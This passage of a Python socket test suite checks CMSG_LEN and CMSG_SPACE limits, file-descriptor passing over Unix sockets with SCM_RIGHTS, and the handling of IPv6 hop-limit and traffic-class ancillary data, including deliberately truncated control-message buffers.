self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
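                # Keep only whole ints: the kernel may truncate the
                # final item, leaving a partial integer at the end of
                # cmsg_data, so slice off any trailing remainder bytes.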
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
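    # Each received ancillary data item is a (cmsg_level, cmsg_type,
    # cmsg_data) tuple, e.g. (IPPROTO_IPV6, IPV6_HOPLIMIT, <4-byte int>).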
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
